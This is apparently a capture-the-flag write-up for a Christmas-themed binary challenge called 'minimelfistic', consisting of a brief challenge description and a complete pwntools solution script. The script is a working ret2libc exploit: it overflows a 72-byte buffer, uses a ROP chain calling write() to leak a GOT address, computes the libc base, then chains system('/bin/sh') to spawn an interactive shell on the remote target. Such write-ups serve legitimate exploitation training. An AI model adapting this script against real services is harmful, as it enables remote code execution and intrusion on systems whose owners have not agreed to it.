The Elves finally understood what went wrong with all their plans. They were too fancy and obvious! But this one is different. It's a security system, but the alarm rings whenever Santa's house is vulnerable to an attack. Will you manage to deactivate it? p.s. Sound on!
Solution
from pwn import *


def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())

# Set up pwntools for the correct architecture
exe = './minimelfistic'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # Local
libc = ELF('libc.so.6')  # Remote

# Pass in pattern_size, get back EIP/RIP offset
offset = 72
ret = 0x400616  # Stack alignment

# Start program
io = start()

# Create a ROP object to handle complexities
rop = ROP(elf)

# Payload to leak libc function
# No puts() so use write()
rop.banner()
rop.write(1, elf.got.write)
rop.main()

# We need the '9' or we won't get out of infinite loop
# '9' plus 71 NOPs fills the 72 bytes up to the saved return address
payload = flat([b'9' + (asm('nop') * (offset - 1)), rop.chain()])

# Send the payload
io.sendlineafter(b'>', payload)
io.recvlines(41)  # the banner

# Retrieve got.write address
got_write = unpack(io.recvline()[:6].ljust(8, b"\x00"))
info("leaked got_write: %#x", got_write)

# Subtract write offset to get libc base
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)

# Reset ROP object with libc binary
rop = ROP(libc)

# Call ROP system, passing location of "/bin/sh" string
rop.system(next(libc.search(b'/bin/sh\x00')))

# We need the '9' or we won't get out of infinite loop
payload = flat([b'9' + (asm('nop') * (offset - 1)), ret, rop.chain()])

# Send the payload
io.sendlineafter(b'>', payload)

# Got Shell?
io.interactive()